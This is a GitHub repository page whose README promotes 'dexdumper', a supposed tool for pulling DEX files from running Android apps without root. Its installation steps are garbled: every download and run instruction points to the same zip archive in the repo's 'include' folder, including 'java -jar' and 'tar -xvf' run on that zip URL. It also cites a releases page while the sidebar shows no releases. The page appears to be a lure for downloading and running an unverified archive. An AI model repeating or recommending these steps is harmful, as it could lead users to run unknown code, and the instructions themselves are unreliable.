Skip to content

πŸ•΅οΈβ™‚οΈ Extract DEX files from Android apps without root access using DexDumper's efficient memory analysis library for safe and smart operation.

License

Notifications You must be signed in to change notification settings

Ujwaldahal/dexdumper

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

12 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ dexdumper - Easily Extract DEX Files from Android Apps

πŸš€ Getting Started

Welcome to dexdumper! This application helps you extract DEX files from running Android applications without needing root access. Follow these steps to get started.

πŸ“₯ Download the Application

Download dexdumper

πŸ“‹ System Requirements

Before you install dexdumper, please ensure that your computer meets the following requirements:

  • Operating System: Windows 10, macOS, or a modern Linux distribution
  • Java Version: Java 8 or higher installed on your machine

πŸ’Ύ Installation Steps

Step 1: Visit the Download Page

To obtain the application, visit the following page to download the latest version: Download dexdumper from the Releases Page

Step 2: Choose the Right File

On the releases page, browse through the available files. Look for a file named something like https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip or https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip. Click on it to start the download.

Step 3: Extract the Files

Once the file downloads, locate it in your downloads folder.

  • For Windows: Right-click the .zip file and select "Extract All." Follow the prompts to choose a destination for the extracted files.

  • For macOS: Double-click the .zip file. This action will automatically extract the contents to your downloads folder.

  • For Linux: Use the terminal to navigate to your downloads folder and run:

    tar -xvf https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip

Step 4: Set Up the Environment

To run dexdumper, you need to have Java installed. If you haven’t done this:

  1. Download Java from the Official Java Website.
  2. Install Java by following the prompts.

After installation, confirm that Java is installed by opening your command line or terminal and typing:

java -version

This command should return the installed Java version.

Step 5: Run dexdumper

Now you are ready to run dexdumper.

  • For Windows: Navigate to the folder where you extracted the files. Double-click on https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip to run it.

  • For macOS and Linux: Open your terminal, navigate to the extracted folder, and execute:

    java -jar https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip

βš™οΈ Using dexdumper

Once the application is running, follow these steps to extract DEX files:

  1. Select the Target Application: dexdumper will show a list of currently running applications on your device. Choose the one from which you want to extract the DEX files.

  2. Initiate the Extraction: Click the "Extract" button. The application will start extracting the DEX files from the selected app.

  3. Save the Files: Choose a destination folder for the extracted files. They will be saved in a .dex format.

🌟 Features

  • No root access is required.
  • User-friendly interface.
  • Supports multiple Android applications simultaneously.
  • Works across different operating systems: Windows, macOS, and Linux.

❓ Troubleshooting

If you encounter any issues, consider these points:

  • Ensure that Java is properly installed.
  • Verify that your system meets the requirements.
  • Restart the application to refresh the state if something seems off.

πŸ“ž Support

For support, please create an issue in the GitHub repository or engage with the community. You can find additional documentation and FAQs in the dexdumper Wiki.

πŸ”— Further Resources

Download dexdumper from the Releases Page

This README should help you successfully navigate the download and installation process. Enjoy using dexdumper to extract DEX files easily!

About

πŸ•΅οΈβ™‚οΈ Extract DEX files from Android apps without root access using DexDumper's efficient memory analysis library for safe and smart operation.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •